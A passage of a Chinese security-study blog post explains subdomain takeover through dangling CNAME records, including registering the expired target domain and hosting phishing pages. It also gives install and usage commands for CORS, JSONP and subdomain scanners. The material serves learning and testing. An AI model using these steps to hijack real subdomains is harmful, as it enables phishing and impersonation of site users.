<h5 id="子域名接管-瓜迪个人子域名劫持接管"><a href="#子域名接管-瓜迪个人子域名劫持接管" class="headerlink" title="子域名接管-瓜迪个人子域名劫持接管"></a>子域名接管-瓜迪个人子域名劫持接管</h5><figure class="highlight html"><table><tr><td class="code"><pre><span class="line">复现步骤：:xiaodi8.com </span><br><span class="line">1、通过检测cname获取指向</span><br><span class="line">2、发现testxiaodi.fun过期受控</span><br><span class="line">3、注册testxiaodi.fun实现控制</span><br><span class="line"></span><br><span class="line">test.baidu.com设置了cname test.xxxx.com</span><br><span class="line">如果这个时候 test.xxxx.com过期或者失效等</span><br><span class="line">我们是不是注册这个域名，实现对test.baidu.com控制</span><br><span class="line"></span><br><span class="line">在域名解析的时候，CNAME的记录类型是将一个域名指向另外一个域名</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241163408600.png" alt="1649122555290-d48f1e20-24b2-4271-8632-de9a562888b1.png"></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">这个意思是：假如test.mumuxi8.com设置了cname，指向www.mumuxi666.com</span><br><span class="line">而www.mumuxi666.com指向了地址47.100.167.248，这个时候，test.mumuxi8.com-&gt;www.mumuxi666.com--&gt;47.100.167.248  相当于test.mumuxi8.com访问就是访问47.100.167.248这个域名。</span><br><span class="line"></span><br><span class="line">假如这个www.mumuxi666.com过期了，然后攻击者注册了这个域名（这个域名被攻击者所有）然后在网页中制作与test.mumuxi8.com这个相识的钓鱼页面，那么访问test.mumuxi8.com这个域名，相当于访问了攻击者的域名。实现了对test.mumuxi8.com的控制。</span><br><span class="line"></span><br><span class="line">需要留意这个www.mumuxi666.com这个域名有没有过期。</span><br></pre></td></tr></table></figure>

<h5 id="检测项目-CORS-JSONP-子域名接管"><a href="#检测项目-CORS-JSONP-子域名接管" class="headerlink" title="检测项目-CORS&amp;JSONP&amp;子域名接管"></a>检测项目-CORS&amp;JSONP&amp;子域名接管</h5><p>CORS</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">cors检测项目：CORScanner-1.0.1</span><br><span class="line">项目地址：https://github.com/chenjj/CORScanner</span><br><span class="line"></span><br><span class="line">安装（用python38）</span><br><span class="line">G:\python38\Scripts\pip.exe install -r requirements.txt</span><br><span class="line">G:\python38\Scripts\pip.exe install corscanner</span><br><span class="line">G:\python38\Scripts\pip.exe install cors</span><br><span class="line"></span><br><span class="line">使用：</span><br><span class="line">G:\python38\python.exe cors_scan.py</span><br><span class="line">G:\python38\python.exe cors_scan.py -i top_100_domains.txt -t 100</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241174345973.png" alt="1649125497094-da2868df-b601-4124-996d-ad5085e33800.png"></p>
<p>JSONP</p>
<p><img src="/../../imgs/image-20240101152944316.png" alt="image-20240101152944316"></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">安装完成后会出现JsonpHunter这个栏</span><br><span class="line">当访问huya.com的时候，所有的回调会在在这里显示</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241190421763.png" alt="1649127016834-8769d38b-8c39-4e30-be97-9712216d6ada.png"></p>
<p>子域名接管</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">项目工具：dnsub_windows_amd64_v2.0</span><br><span class="line">项目地址：http://github/yunxu1/dnsub</span><br><span class="line"></span><br><span class="line">使用：dnsub_windows_amd64.exe -d http://xiaodi8.com</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241197316359.png" alt="1649127505390-a2662bd5-cbbf-41c3-a626-f6d30805c585.png"></p>
</article><div class="post-copyright"><div class="post-copyright__author_group"><a class="post-copyright__author_img" href="/about/"><img class="post-copyright__author_img_front" src="https://pic.imgdb.cn/item/65ae347f871b83018af6c612.jpg"></a><div class="post-copyright__author_name">秋刀鱼</div><div class="post-copyright__author_desc">生活明朗,万物可爱</div></div><div class="post-tools" id="post-tools"><div class="post-tools-left"><div id="quit-box" onclick="RemoveRewardMask()"></div></div></div><div class="post-copyright__notice"><span class="post-copyright-info">本文是原创文章，采用<a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>协议，完整转载请注明来自<a href="/">秋刀鱼</a></span></div></div><div class="post-tools-right"><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"><span class="tags-punctuation"></span>基础漏洞<span class="tagsPageCount">15</span></a></div></div></div><nav class="needEndHide pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/11/30/Web%E6%BC%8F%E6%B4%9E/%E5%85%B6%E4%BB%96SQL%E6%B3%A8%E5%85%A5/"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">其他SQL注入</div></div></a></div><div class="next-post pull-right"><a href="/2023/11/30/Web%E6%BC%8F%E6%B4%9E/%E5%BC%B1%E5%8F%A3%E4%BB%A4/"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">弱口令</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="scoicon sco-star-smile-fill"></i><span>喜欢这篇的人也看了</span><div class="relatedPosts-link"><a onclick="event.preventDefault(); toRandomPost();" href="javascript:void(0);" rel="external nofollow" data-pjax-state="">随便逛逛</a></div></div><div class="relatedPosts-list"><div><a href="/2023/11/30/Web%E6%BC%8F%E6%B4%9E/CSRF%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/" title="CSRF跨站请求伪造"><img class="cover" src="https://w.wallhaven.cc/full/l8/wallhaven-l8rloq.jpg" alt="cover"><div class="content is-center"><div class="title">CSRF跨站请求伪造</div></div></a></div><div><a href="/2023/11/30/Web%E6%BC%8F%E6%B4%9E/CRLF/" title="CRLF注入"><img class="cover" src="https://w.wallhaven.cc/full/we/wallhaven-wew7p6.jpg" alt="cover"><div class="content is-center"><div class="title">CRLF注入</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-content"><div class="card-info-avatar is-center"><div class="author-info__top-group"><div class="author-info__sayhi" id="author-info__sayhi" onclick="sco.changeSayHelloText()">sayhello.morning</div></div></div><div class="avatar-img-group"><img class="avatar-img" alt="头像" src="https://pic.imgdb.cn/item/65ae347f871b83018af6c612.jpg"><div class="avatar-sticker"><img class="avatar-sticker-img" src="https://bu.dusays.com/2023/12/30/659011053e246.png" alt="心情贴纸"></div></div><div class="author-info__description_group"><div class="author-info__description">分享自己对编程的<b>热爱</b>，对美好生活的<b>向往</b>，对知识海洋<b>探索历程</b>。</div><div class="author-info__description2">相信你可以在这里找到对你有用的知识和教程。</div></div><div class="author-info__bottom-group"><a class="author-info__bottom-group-left" href="/about/"><div class="author-info__name">Vocal</div><div class="author-info__desc">生活明朗,万物可爱</div></a><div class="card-info-social-icons is-center"><a class="social-icon" target="_blank" rel="noopener" href="https://github.com/hxysaury" title="Github"><i class="scoicon  sco-github-line"></i></a><a class="social-icon" target="_blank" rel="noopener" href="https://space.bilibili.com" title="Bilibili"><i class="scoicon  sco-bilibili-line"></i></a></div></div></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="scoicon sco-menu-line"></i><span>文章目录</span></div><div class="toc-content" id="toc-content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5"><span class="toc-text">同源策略</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E6%8E%A5%E7%AE%A1"><span class="toc-text">子域名接管</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#COSP%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90"><span class="toc-text">COSP跨域资源</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#JSONP%E8%B7%A8%E5%9F%9F%E5%9B%9E%E8%B0%83"><span class="toc-text">JSONP跨域回调</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A1%88%E4%BE%8B%E6%BC%94%E7%A4%BA"><span class="toc-text">案例演示</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#CORS%E8%B5%84%E6%BA%90%E8%B7%A8%E5%9F%9F-%E6%95%8F%E6%84%9F%E9%A1%B5%E9%9D%A2%E6%BA%90%E7%A0%81%E8%8E%B7%E5%8F%96"><span class="toc-text">CORS资源跨域-敏感页面源码获取</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#JSONP%E5%9B%9E%E8%B0%83%E8%B7%A8%E5%9F%9F-%E6%9F%90%E7%89%99%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-text">JSONP回调跨域-某牙个人信息泄露</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E6%8E%A5%E7%AE%A1-%E7%93%9C%E8%BF%AA%E4%B8%AA%E4%BA%BA%E5%AD%90%E5%9F%9F%E5%90%8D%E5%8A%AB%E6%8C%81%E6%8E%A5%E7%AE%A1"><span class="toc-text">子域名接管-瓜迪个人子域名劫持接管</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%A3%80%E6%B5%8B%E9%A1%B9%E7%9B%AE-CORS-JSONP-%E5%AD%90%E5%9F%9F%E5%90%8D%E6%8E%A5%E7%AE%A1"><span class="toc-text">检测项目-CORS&amp;JSONP&amp;子域名接管</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="scoicon sco-map-line"></i><span>最近发布</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2024/03/04/study-road/JAVA%E5%AE%89%E5%85%A8&amp;%E4%BA%91%E5%AE%89%E5%85%A8&amp;%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="JAVA安全&amp;云安全&amp;内网安全"><img alt="JAVA安全&amp;云安全&amp;内网安全" src="https://pic.imgdb.cn/item/65ebfc499f345e8d03a57b7d.png"></a><div class="content"><a class="title" href="/2024/03/04/study-road/JAVA%E5%AE%89%E5%85%A8&amp;%E4%BA%91%E5%AE%89%E5%85%A8&amp;%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="JAVA安全&amp;云安全&amp;内网安全">JAVA安全&amp;云安全&amp;内网安全</a></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/03/04/study-road/%E8%93%9D%E9%98%9F%EF%BC%88%E5%BA%94%E6%80%A5%E3%80%81%E5%8F%96%E8%AF%81%E7%AD%89%EF%BC%89/" title="蓝队（应急、取证等）"><img alt="蓝队（应急、取证等）" src="https://pic.imgdb.cn/item/65ebfc499f345e8d03a57b7d.png"></a><div class="content"><a class="title" href="/2024/03/04/study-road/%E8%93%9D%E9%98%9F%EF%BC%88%E5%BA%94%E6%80%A5%E3%80%81%E5%8F%96%E8%AF%81%E7%AD%89%EF%BC%89/" title="蓝队（应急、取证等）">蓝队（应急、取证等）</a></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/03/03/Android/%E5%88%9D%E8%AF%86smali/" title="初识smali"><img alt="初识smali" src="https://pic.imgdb.cn/item/65eb11b69f345e8d039d0162.png"></a><div class="content"><a class="title" href="/2024/03/03/Android/%E5%88%9D%E8%AF%86smali/" title="初识smali">初识smali</a><a class="article-recent_post_categories" href="/2024/03/03/Android/%E5%88%9D%E8%AF%86smali/">Andriod逆向</a></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/03/02/Android/APK%E7%BB%93%E6%9E%84/" title="APK结构&amp;双开&amp;汉化&amp;图标修改"><img alt="APK结构&amp;双开&amp;汉化&amp;图标修改" src="https://pic.imgdb.cn/item/65eaf60e9f345e8d033954f1.png"></a><div class="content"><a class="title" href="/2024/03/02/Android/APK%E7%BB%93%E6%9E%84/" title="APK结构&amp;双开&amp;汉化&amp;图标修改">APK结构&amp;双开&amp;汉化&amp;图标修改</a><a class="article-recent_post_categories" href="/2024/03/02/Android/APK%E7%BB%93%E6%9E%84/">Andriod逆向</a></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/03/02/CMD/%E6%9F%A5%E7%9C%8B%E7%94%B5%E8%84%91%E8%BF%9E%E6%8E%A5%E8%BF%87%E7%9A%84%E6%97%A0%E7%BA%BF/" title="查看电脑连接过的WIFI"><img alt="查看电脑连接过的WIFI" src="false/../../imgs/image-20240309220356881.png"></a><div class="content"><a class="title" href="/2024/03/02/CMD/%E6%9F%A5%E7%9C%8B%E7%94%B5%E8%84%91%E8%BF%9E%E6%8E%A5%E8%BF%87%E7%9A%84%E6%97%A0%E7%BA%BF/" title="查看电脑连接过的WIFI">查看电脑连接过的WIFI</a></div></div></div></div></div></div></main><footer id="footer"><div id="sco-footer-bar"><div class="footer-logo"><span class="scoicon">秋刀鱼</span></div><div class="footer-bar-description">来自秋刀鱼 - 生活明朗,万物可爱的文章</div><a class="footer-bar-link" href="/">了解更多</a></div><div id="footer_deal"><div class="footer_mini_logo" id="footer_mini_logo" title="返回顶部" onclick="sco.toTop()"><img src="https://pic.imgdb.cn/item/65ae347f871b83018af6c612.jpg" alt="返回顶部"></div></div><div id="sco-footer"></div><div id="footer-bar"><div class="footer-bar-links"><div class="footer-bar-left"><div class="copyright">© 2022 - 2024 By&nbsp;<a class="footer-bar-link" href="/">Vocal</a></div></div><div class="footer-bar-right"><a class="footer-bar-link" target="_blank" rel="noopener" href="https://blog.csdn.net/ZhaoSong_?type=lately" title="CSDN">CSDN</a><a class="footer-bar-link" href="/atom.xml" title="订阅">订阅</a><a class="footer-bar-link cc"><i class="scoicon sco-copyright-line"></i><i class="scoicon sco-creative-commons-by-line"></i><i class="scoicon sco-creative-commons-nc-line"></i><i class="scoicon sco-creative-commons-nd-line"></i></a></div></div></div></footer></div><!-- inject body--><div><script src="/js/main.js?v=1.5.1"></script><script src="/js/utils.js?v=1.5.1"></script><script src="https://cdn.cbd.int/solitude-source/js/universe.min.js"></script><script>dark()
</script><script src="https://cdn.staticfile.org/pjax/0.2.8/pjax.min.js"></script><script src="https://cdn.staticfile.org/node-snackbar/0.1.16/snackbar.min.js"></script><script src="https://cdn.staticfile.org/medium-zoom/1.1.0/medium-zoom.min.js"></script><script src="https://cdn.staticfile.org/aplayer/1.10.1/APlayer.min.js"></script><script src="https://cdn.staticfile.org/meting/2.0.1/Meting.min.js"></script><script>const meting_api = 'https://meting.qjqq.cn/?server=:server&type=:type&id=:id&auth=:auth&r=:r';
</script><script src="/js/music.js?v=1.5.1"></script><script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script><script src="https://cdn.staticfile.org/lunr.js/2.3.9/lunr.min.js"></script></div><div id="js-pjax"><script async src="https://cdn.staticfile.org/busuanzi/2.3.0/bsz.pure.mini.min.js"></script><script id="config-diff">var PAGE_CONFIG = {
    is_post: true,
    is_page: false,
    is_home: false,
    page: 'post',
    toc: true,
    comment: false,
}
</script></div><!-- newest comment--><!-- pjax--><script>let pjaxSelectors = [
    'title',
    '#body-wrap',
    '#site-config',
    'meta[name="description"]',
    '#js-pjax',
    'meta[property^="og:"]',
]

const pjax = new Pjax({
    elements: 'a:not([target="_blank"])',
    selectors: pjaxSelectors,
    cacheBust: false,
    analytics: false,
    scrollRestoration: false
})

document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
})

document.addEventListener('pjax:complete', () => {
    window.refreshFn()
})

document.addEventListener('pjax:error', (e) => {
    if (e.request.status === 404) {
        pjax.loadUrl('/404.html')
    }
})</script><!-- theme--><script>initTheme = () => {
    const cachedMode = saveToLocal.get('theme');
    if (cachedMode === undefined)
        document.documentElement.setAttribute('data-theme', 'light');
    else
        document.documentElement.setAttribute('data-theme', cachedMode);
}
initTheme()</script><!-- search--><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="scoicon sco-close-fill"></i></button></nav><div class="search-wrap"><div class="search-box"><input class="search-box-input" id="search-input" type="text" autocomplete="off" spellcheck="false" autocorrect="off" autocapitalize="off" placeholder="输入关键词快速查找"></div><div id="search-results"><div id="search-hits"></div></div><div id="search-pagination"></div><div id="search-tips"></div></div></div><div id="search-mask"></div></div><script src="/js/search/local.js?v=1.5.1"></script><!-- music--><div class="needEndHide" id="nav-music" onclick="sco.musicToggle()"><div id="nav-music-hoverTips">音乐已暂停</div><meting-js id="8407304077" server="netease" type="playlist" mutex="true" preload="none" data-lrctype="0" order="random" theme="var(--sco-main)"></meting-js></div></body></html><script>const posts=["2024/03/04/study-road/JAVA安全&云安全&内网安全/","2024/03/04/study-road/蓝队（应急、取证等）/","2024/03/03/Android/初识smali/","2024/03/02/Android/APK结构/","2024/03/02/CMD/查看电脑连接过的无线/","2024/03/02/record/解决百度网盘下载慢问题/","2024/03/01/Android/环境搭建/","2024/03/01/Blue-Team/web1/","2024/03/01/Blue-Team/web2/","2024/02/26/record/README/","2024/02/24/安全工具/Nmap/","2024/02/24/安全工具/sqlmap/","2024/02/23/安全工具/hydra/","2024/02/23/安全工具/john&zip2john/","2024/02/23/安全工具/kali-wordlists/","2024/02/23/安全工具/lbd负载均衡/","2024/02/23/安全工具/msf生成木马/","2024/02/23/安全工具/nc/","2024/02/22/安全工具/nikto/","2024/02/20/record/tmux/","2024/02/18/内网安全/域控-防火墙-组策略不出网上线/","2024/02/14/record/涩涩情侣飞行棋密码破解/","2024/01/29/Blue-Team/日志自动提取分析项目_ELK_Logkit_LogonTracer_Anolog/","2024/01/11/渗透测试/CS架构客户端信息收集与流量分析/","2024/01/10/渗透测试/CS架构客户端环境搭建/","2024/01/08/内网安全/reGeorg流量转发/","2024/01/06/内网安全/frp穿透实验/","2024/01/03/内网安全/黄金票据与白银票据/","2024/01/02/内网安全/哈希传递/","2024/01/02/内网安全/域环境&域信息收集/","2024/01/01/内网安全/CS鱼饵制作/","2024/01/01/安全工具/Cobalt Strike/","2023/12/10/漏洞复现/Spring Boot Actuator未授权访问漏洞/","2023/11/30/Web漏洞/API攻防/","2023/11/30/Web漏洞/CSRF跨站请求伪造/","2023/11/30/Web漏洞/CRLF/","2023/11/30/Web漏洞/JWT安全/","2023/11/30/Web漏洞/SSRF服务端请求伪造/","2023/11/30/Web漏洞/URL重定向跳转/","2023/11/30/Web漏洞/WEB拒绝服务/","2023/11/30/Web漏洞/XSS跨站/","2023/11/30/Web漏洞/业务逻辑/","2023/11/30/Web漏洞/任意文件包含/","2023/11/30/Web漏洞/其他SQL注入/","2023/11/30/Web漏洞/子域名接管&COSP跨域资源&JSONP跨域回调/","2023/11/30/Web漏洞/弱口令/","2023/11/30/渗透测试/信息收集/","2023/11/30/漏洞复现/MySQL注入漏洞/","2023/11/28/Web漏洞/WAF攻防/","2023/11/24/渗透测试/Windows提权姿势/","2023/11/22/渗透测试/linux提权姿势/","2023/11/22/渗透测试/MYSQL提权/","2023/11/20/Web漏洞/RCE/","2023/11/20/Web漏洞/任意文件上传/","2023/11/20/渗透测试/phpMyAdmin利用/","2023/11/19/漏洞复现/phpstudy2016-2018命令执行漏洞复现/","2023/11/16/漏洞复现/Fastjson_1.2.47_rce/","2023/11/16/漏洞复现/fastjson_1.2.24_unserializer_rce/","2023/11/13/漏洞复现/Zookeeper未授权/","2023/11/11/漏洞复现/MongoDB未授权/","2023/11/11/漏洞复现/Redis未授权/","2023/11/09/漏洞复现/Elasticsearch 未授权访问/","2023/11/09/漏洞复现/Memcached 未授权访问/","2023/11/09/漏洞复现/IIS_7.o7.5解析漏洞/","2023/05/19/Python/Python-BBS项目开发/","2023/05/16/Django/Python-Django-图片验证码，发送邮箱，富文本编辑器/","2023/05/14/Django/Python-DJango-Cookie与Session/","2023/05/14/Django/Python-froms组件/","2023/05/14/Python/Python-自定义分页器/","2023/05/13/Django/Django自带的序列化组件/","2023/05/13/Django/Python-Django-批量插入 bulk_create/","2023/05/13/Django/Python-Djangochoices参数/","2023/05/12/Django/Python-Django中间件/","2023/05/12/Django/Python-Django基于jQuery的Ajax实现/","2023/05/12/Django/Python-Django模型层/","2023/05/12/Django/Python-Django模版层/","2023/05/12/Django/Python-Django视图层/","2023/05/12/Django/Python-csrf跨站请求伪造/","2023/05/12/Django/Python-基于Django中间件引发的编程思想/","2023/05/12/Python/Python-auth模块/","2023/05/11/Django/Python-Django路由层/","2023/05/10/Django/Python-Django请求周期流程图（重要）/","2023/05/09/Django/Python-Django ORM/","2023/05/06/Django/Python-Django基本操作/","2023/05/06/Django/Python-Django链接MySQL/","2023/05/06/Django/python-Django小白必会三板斧/","2023/05/06/Django/python-Django静态文件配置/","2023/05/06/Python/Python-pycharm链接数据库（MySQL）/","2023/05/05/Django/Python-Django引入/","2023/04/18/Python/Python爬虫/","2023/04/11/Python/Python-并发编程/","2023/04/11/Python/Python正则/","2023/04/10/Python/Python-网络编程/","2023/04/10/Python/Python文件操作/","2023/04/09/Python/Python-办公自动化/","2023/04/09/Python/Python面向对象/","2023/04/07/Python/Python函数/","2023/04/07/Python/Python模块与包/","2023/04/06/Python/Python数据类型/","2023/04/05/Python/Python流程控制/","2023/04/04/Python/Python初识/","2023/04/02/Python/Python-打包exe执行文件/"];function toRandomPost(){ pjax.loadUrl('/'+posts[Math.floor(Math.random()*posts.length)]); };</script>